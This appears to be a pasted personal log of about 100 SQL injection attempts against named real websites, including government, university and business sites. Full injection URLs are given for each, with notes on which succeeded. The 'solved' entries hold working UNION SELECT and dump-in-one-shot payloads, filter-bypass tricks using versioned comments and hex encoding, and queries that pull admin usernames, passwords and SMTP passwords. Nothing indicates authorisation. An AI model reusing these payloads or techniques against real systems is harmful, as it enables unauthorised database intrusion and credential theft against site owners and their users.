exengg

Challenge Done

May 14th, 2019
  1. problems
  2.  
  3. 1.http://esjindex.org/search.php?id=-1'+#uNiOn+#sEleCt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
  4. 2.https://mahara.org/group/view.php?id=1
  5. 3.https://www.jdcaravan.com/store.php?id=1 [no error]
  6.  
  7. 3 site not vln
  8.  
  9. 4.https://www.jbctools.com/cataleg.php?id=1
  10. 5.http://www.silverngrace.com/productlist.php?id=1
  11.  
  12. 5 site not vln
  13.  
  14. 6.http://www.microtek.com/products.php?KindID=6&ID=-1+UNION+ALL+SELECT+1,2,3,4,5,6,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
  15. ##have username,password column but show error to find them
  16. 7.http://isr-tkd.com/index.php?cntr=e/news.php?id=1
  17.  
  18. 7 php error not sql
  19.  
  20. 8.https://www.bnl.gov/ps/beamlines/highlights.php?q=4-ID [error not fixed,.gov site]
  21.  
  22. 8 site permanently moved
  23.  
  24. 9.https://www.jewishgen.org/databases/cemetery/jowbrshow.php?ID=ISR-07022
  25. 10.http://www.rorschach.com/index.php?id=47
  26. 11.http://www.rorschach.com/index.php?id=47 [no error]
  27.  
  28. 11. secure firewall
  29.  
  30. 12.https://www.provision-isr.com/index.php?option=com_sppagebuilder&view=page&id=7&Itemid=302 [no error]
  31. 13.https://isr.umd.edu/news/news_story.php?id=6948 [no error]
  32. 14.http://www.inquiryinaction.org/classroomactivities/activity.php?id=2'+ORDER+BY+1-- - [order by gives error]
  33. 15.https://www.mnmindia.org/portfolio.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,6-- - [vulnerable column not found]
  34. 16.http://www.rockinmusic.net/album_list.php?id=-1'+UNION+ALL+SELECT+1,2-- - [DIOS creates error](column count error half fix...)
  35. 17.http://www.renickbell.net/doku.php?id=music
  36.  
  37. 17 site not vln
  38.  
  39. 19.http://www.rinkydinkelectronics.com/library.php?id=51'-- - [error not fixed]
  40. 20.https://www.bloody.com/en/download.php?id=6' [no error]
  41.  
  42. 20 site not vln this is so popular site for gamers maybe they have bounty program
  43.  
  44. 21.http://www.jncasr.ac.in/annview.php?id=838-- - [you are not authorised to view this site]
  45. 22.https://www.eia.gov/tools/faqs/faq.php?id=427'-- - [error not fixed]
  46.  
  47. 22 same as 30 No.
  48.  
  49. 23.https://www.pwaworldtour.com/index.php?id=2208' [no error]
  50.  
  51. 23 site not vln
  52.  
  53. 24.https://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:relative_strength_index_rsi+ORDER+BY+500-- -
  54.  
  55. 24 site not vln
  56.  
  57. 25.https://kb.wisc.edu/helpdesk/page.php?id=12384-- - [error not fixed]
  58. 26.http://www.iea-pvps.org/index.php?id=6' [no error]
  59.  
  60. 26 site not vln
  61.  
  62. 27.https://www.baylor.edu/law/index.php?id=929875' [....]
  63.  
  64. 27 site not vln
  65.  
  66. 28.http://americanvalues.org/search/item.php?id=18' [page not found,how to fix]
  67.  
  68. 28 site redirect and no redirect not working :(
  69.  
  70. 29.https://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+UNION+ALL+SELECT+1,2,3,4,group_concat(table_name,'::',column_name),6,7,8,9 from information_schema.columns where table_schema=database()-- - [using anything as the separator of table,column creates error]
  71.  
  72. ** convert in hex then use anything**
  73. 29 (solved) https://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+UNION+ALL+SELECT+1,2,3,4,group_concat(table_name,0x3d3e,column_name),6,7,8,9 from information_schema.columns where table_schema=database()-- -
  74.  
  75. 30.https://www.eia.gov/todayinenergy/detail.php?id=34812-- -
  76.  
  77. 30 not sure but it's a US gov site, I don't think sqli
  78.  
  79. 31.https://www.edison-bd.com/company_details.php?id=-7'+UNION+ALL+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12-- - [don't work without DIOS]
  80.  
  81. 31 then use dios sometimes dios work like waff bypass
  82.  
  83. 32.http://weppi.gtk.fi/publ/foregsatlas/article.php?id=7' [query failed]
  84.  
  85. 32 (solved) http://weppi.gtk.fi/publ/foregsatlas/article.php?id=-7 +UNION+ALL+SELECT+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7 -- -
  86.  
  87. 33.http://www.hausalpenrose.com/index.php?id=83 [error site,string fix the error of the site]
  88.  
  89. 33 no redirect not work :(
  90.  
  91. 34.https://www.stradeproject.eu/index.php?id=7-- - [error not fixed]
  92.  
  93. 34 not vuln
  94.  
  95. 35.https://www.hcidhaka.gov.in/pages?id=eyJpdiI6InJvYzZwVFNjemRHXC9BcktoVjFBaUVBPT0iLCJ2YWx1ZSI6InlOcmg0NGRSeWlPc1psZzVlYTNyK0E9PSIsIm1hYyI6ImM4ZTA3NGI1NDU4M2FmM2Q4YzY5MzZmYTBlZjU1MDE1ZTYxZTFhOGRhZjEzYTk3YWFjZmIyYTkxMmNkZmViMDkifQ== [so long parameter]
  96.  
  97. 35 encoded in base 64
  98.  
  99. 36.http://project-lovcen.me/page.php?id=6-- - [error not fixed]
  100. 37.https://mvss.in/gallery.php?id=-6+UNION+ALL+SELECT+@@database-- - [don't show database but show version()]
  101.  
  102. **don't use + ***
  103. 37 (solved) https://mvss.in/gallery.php?id=-6 UNION ALL SELECT /*!12345database()*/ -- -
  104.  
  105. 38.http://bdlaws.minlaw.gov.bd/print_sections_all.php?id=25 order by 1-- - [order by creates error]
  106.  
  107. 38 secure firewall
  108.  
  109. 39.https://www.99marriageguru.com/post.php?id=-19+UNION+ALL+SELECT+1,2,group_concat(table_name,column_name),4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- - [table_name,column_name seperator and '<br>'creates error]
  110.  
  111. ** use hex sometime br not work**
  112. 39 (solved) https://www.99marriageguru.com/post.php?id=-19+UNION+ALL+SELECT+1,2,group_concat(table_name,0x3c62723e,column_name),4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- -
  113.  
  114. 40.https://www.galileo.net.in/prod.php?id=-9+UNION+ALL+SELECT+1,2,3,4-- -
  115.  
  116. 40 (solved) https://www.galileo.net.in/prod.php?id=-9 +/*!12345UNION*/+ALL+SELECT+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4 -- -
  117.  
  118. 41.http://alexmonteith.com/works.php?category=film&name=Film/work_detail.php?id=77'-- - [....]
  119.  
  120. 41 not vlnrbl
  121.  
  122. 42.http://www.maxforlive.com/library/device.php?id=331-- - [not fixed]
  123.  
  124. 42 not sql error maybe
  125.  
  126. 43.http://www.oar-info.ru/index.php?id=138-- - [error not fixed:too many forward attempts]
  127.  
  128. 43 come on dude Russian site :p maybe security high
  129.  
  130. 44.http://sociedadanonima.mx/Projects.php?Id=101-- - [error not fixed]
  131. 45.http://www.vgloop.com/group.php?id=-292+/*!50000UNION*/+ALL+SELECT+1-- -
  132.  
  133. ***use no redirect***
  134. 45 (solved) http://www.vgloop.com/group.php?id=-292 +/*!12345UNION*/+ALL+SELECT+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) -- -
  135.  
  136. 46.http://asakusa-i.tokyo/e/shops/shop.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16-- - [vulnerable column found but version(),database() gives error]
  137.  
  138. 46 language japan :/
  139.  
  140. 47.http://www.amarbooks.com/cat.php?cd=183-- - [403 forbidden]
  141.  
  142. 47 param is not loading
  143.  
  144. 48.http://www.amarbooks.com/download.php?id=18305 order by 1-- - [how many columns]
  145. 47 param is not loading
  146. 49.http://www.freebanglafont.com/download.php?id=752+ORDER+BY+100-- - [how many columns]
  147.  
  148. 49 maybe not sql error check content when error
  149.  
  150. 50.https://seu.edu.bd/dept/cse.php?id=vision-- - [error not fixed]
  151.  
  152. 50 not sql error
  153.  
  154. 51.https://www.nitolinsurance.com/news_details.php?id=-1'+UNION+ALL+SELECT+1,,3,4-- - [when put sername,password it gives error]
  155.  
  156. 51 (solved) https://www.nitolinsurance.com/news_details.php?id=-1' +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+nitolins_website.admin) -- -
  157.  
  158. 52.http://kyanc.edu.bd/employee-view.php?id=4
  159.  
  160. ***parm 4 is not vlnrbl**
  161. 52 (solved) http://kyanc.edu.bd/page.php?id=-2' +UNION+ALL+SELECT+1,2,(/*!%53ELECT*/+/*!50000GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.TABLES*//**//*!%57HERE*//**//*!TABLE_SCHEMA*//**/LIKE/**/DATABASE()),4,5,6 -- -
  162.  
  163. 53.http://khpg.org/en/index.php?id=1551054011'-- -
  164. 54.http://www.pacbi.org/etemplate.php?id=1451'+ORDER+BY+100000-- - [no. of columns]
  165.  
  166. 54 This website has moved but this site will still be visible as an archive.
  167.  
  168. 55.http://www.minddesign.co.uk/show.php?id=-174'+UNION+ALL+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema=database()-- - [illigal mix error]
  169. 56.https://www.ileswastesystems.co.uk/index.php?id=-1'+UNION+ALL+SELECT+1,2,3-- - [....]
  170. 57.http://www.josleys.com/article_show.php?id=82' [invalid input]
  171. 58.https://jobs.bdjobs.com/jobdetails.asp?id=838856-- -
  172.  
  173. 58 MSSQL
  174.  
  175. 59.http://www.bdjobstoday.com/jobsbycategory.php?cat=4' order by 1-- - [order by creates error]
  176. 60.https://jobs.bdjobs.com/m/jobsearch.aspx?fcatId=1-- - [error not fixed]
  177.  
  178. 60 MSSQL
  179.  
  180. 61.http://www.filmposter-archiv.de/filmplakat.php?id=29121-- -
  181.  
  182. 61 page moved permanently
  183.  
  184. 62.http://bdlaws.minlaw.gov.bd/bangla_pdf_part.php?id=1105+ORDER+BY+1-- - [order by creates error]
  185.  
  186. 62 strong firewall
  187.  
  188. 63.http://www.sneaindia.com/Admin_index.php?id=11 union select 1-- - [column no]
  189. 64.https://www.eduhelpindia.com/college.php?id=-1541' /*!50000union*/ select 1,2,3,group_concat(table_name,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32from information_schema.columns where table_schema=database()-- - [group_concat creates error]
  190.  
  191. 64 (solved) https://www.eduhelpindia.com/college.php?id=-1541' /*!50000union*/ select 1,2,3,/*!13337group_concat(table_name,'::',column_name)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 /*!12345from*/ /*!12345information_schema.columns*/ /*!50000where*/ /*!13337table_schema*/=/*!50000database()*/-- -
  192.  
  193. 65.http://www.pbw-india.com/category.php?id=-1 /*!50000union*/ select 1,2,3,4,5,6,7,8-- - [don't show vulnerable column]
  194.  
  195. 65 page permanently moved
  196.  
  197. 66.https://www.hotelmetdelhi.com/pages.php?id=-84'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10-- - [don't show vulnerable column]
  198.  
  199. 66 (solved) view-source:https://www.hotelmetdelhi.com/pages.php?id=78'+UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10 from information_schema.columns where table_name='yp_admin'-- -
  200.  
  201. 67.http://www.channel-bd.net/channel.php?id=-207'+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),14-- - [gives error to find password & user]
  202.  
  203. 67 firewall maybe so strong
  204.  
  205. 68.http://naasindia.org/detail.php?id=624 order by 1-- - [order by creates error]
  206. 69.http://www.pcs.org.ps/yZLN/pU2dL.php?id=258808+ORDER+BY+10-- -
  207.  
  208. 69 site is ok
  209.  
  210. 70.http://www.repetidordisc.com/ing/bandas.php?id=-15+UNION+ALL+SELECT+1,group_concat(table_name,'::',column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_schema=database()-- - [use of seperator makes error]
  211.  
  212. view-source:http://www.repetidordisc.com/ing/bandas.php?id=-15 UNION ALL SELECT 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -
  213.  
  214. 71.https://kb.wisc.edu/page.php?id=81448-- -
  215. 72.https://www.h-net.org/jobs/job_display.php?id=58048-- -
  216. 73.http://www.ryans-muddy-boot.net/index.php?id=5--
  217.  
  218. 73 page not found
  219.  
  220. 74.http://bd-motor.com/page.php?action=pview&id=-563' /*!50000union*/ select 1,(SELECT+GROUP_CONCAT(smtppass+SEPARATOR+0x3c62723e)+FROM+bdmotor_bd.settings),3,4,5,6,7,8-- - [gives error in the last moment]
  221.  
  222. 74 (Solved) http://bd-motor.com/page.php?action=pview&id=-563' /*!50000union*/ select 1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8-- -
  223.  
  224. 75.http://www.gaysport.cz/index.php?id=-2 /**/UNION/**//*!50000SELECT*//**/ 1,2-- - [failed to bypass]
  225. 76.http://lola.land/projecten.php?id=-80+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- - [don't show vulnerable columns]
  226.  
  227. 76 no redirect not working :(
  228.  
  229. 77.https://www.rhinebeckcsd.org/pagecontent.php?id=-14 /*!50000union*/ select 1,2,3,4,,,7,8,9,10,11,12-- - [not showing vulnerable column]
  230. 78.http://www.greenhorizon.lk/selection.php?id=-19 /*!50000union*/ select 1-- - [500 server error not fixed]
  231. 79.https://survey.gov.lk/epy/single.php?id=-1'+UNION+ALL+SELECT+1-- - [vulnerable column not found]
  232. 80.http://surf-lanka.com/placeinfo.php?id=-1'+UNION+ALL+SELECT+1,group_concat(username,password),3,4,5,6,7,8,9,10 from dqsrt_surflanka-- - [don't show pass,uname]
  233.  
  234. 80 not loading
  235.  
  236. 81.http://www.jlbender.nl/indexvt.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151-- - [don't show vulnerable column]
  237. 82.https://www.wecaregreybruce.ca/ytopic.php?id=-5'+UNION+ALL+SELECT+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5-- - [403 forbidden]
  238.  
  239. 82 (solved) https://www.wecaregreybruce.ca/ytopic.php?id=-5' UNION ALL SELECT 1,/*!12345group_concat(table_name,0x3c62723e)*/,3,4,5 /*!12345from*/ /*!13337information_schema.tables*/ /*!50000where*/ /*!12345table_schema*/=/*!13337database()*/ -- -
  240.  
  241. 83.http://www.mwnuk.co.uk/resourcesDetail.php?id=-97+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- -
  242.  
  243. 83 page moved permanently
  244.  
  245. 84.http://www.true-magic.com/view.php?id=1-- - [not fixed]
  246. 85.https://www.hotelmetdelhi.com/pages.php?id=-96'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10-- - [not showing vulnerable column]
  247.  
  248. 85 (solved) view-source:https://www.hotelmetdelhi.com/pages.php?id=78'+UNION+ALL+SELECT+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10 -- -
  249.  
  250. 86.http://www.thekhyber.co.uk/menu.php?id=-40'+UNION+ALL+SELECT+1,2,group_concat(id,pal),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aquarious_core-- - [error]
  251.  
  252. 86 (solved) http://www.thekhyber.co.uk/menu.php?id=-40' +UNION+ALL+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- -
  253.  
  254. 87.http://www.ipicgroup.com/shopping_centre.php?id=-1+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ipicgr_db1.users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- - [error in the last cmd]
  255.  
  256. 88(solved) http://www.ipicgroup.com/shopping_centre.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),14,15,16,17 -- -
  257.  
  258. 88.http://createmytravel.co.in/hotel-details.php?id=-6 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+Integrb2_createmytravel .tbl_admin),13-- -[cmd-error-not acceptable ]
  259.  
  260. 88 site is not loading
  261.  
  262. 89.https://lcps-lebanon.org/featuredArticle.php?id=-137 /*!50000union*/ select 1,2,@@database,4,5,6,7,8,9-- - [inclusion of database gives error]
  263.  
  264. 89 not loading
  265.  
  266. 90.http://www.fidelity.com.lb/page.php?id=7-- - [error half fixed]
  267.  
  268. 90 site is not loading
  269.  
  270. 91.http://www.aayanre.com/project-cat.php?id=1' /*!50000union+select*/ 1,2,3,4-- - [query failed]
  271. 92.http://www.ijqr.net/paper.php?id=-638' /*!50000union*/ select 1,2,3,4,5,6,7,8,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ijqr_ijqr.openconf_reviewer),10,11,12,13,14,15-- -
  272.  
  273. 92 (solved) http://www.ijqr.net/paper.php?id=-638' /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)-- -
  274.  
  275. 93.http://agrofor.ues.rs.ba/paper.php?id=12-- - [error not fixed]
  276. 94.http://wondernexa.com/car.php?id=-1 /**/UNION/**//*!50000SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- - [....]
  277. 95.http://www.antypas1.com/cars.php?id=3-- - [forbidden,no permission]
  278. 96.http://wondercars.net/get-email-car.php?id=-12 /*!50000union*/ select 1,2,3,4-- - different number of column
  279. 97.https://www.iautocars.com/sales/vehicle.php?id=-1' /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -
  280.  
  281. 97 (solved) https://www.iautocars.com/sales/vehicle.php?id=-1' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),19,20,21,22,23,24,25,26,27,28,29,30,31 -- -
  282.  
  283. 98.http://www.nrhz.de/flyer/beitrag.php?id=-24002'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- - [not showing vulnerable column]
  284.  
  285. 98(solved) http://www.nrhz.de/flyer/beitrag.php?id=-24002' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -
  286.  
  287. 99.http://www.alda-europe.eu/newSite/project_dett.php?ID=57-- - [access denied]
  288. 100.https://36igc.org/page.php?id=17'+ORDER+BY+1-- - [order by gives error]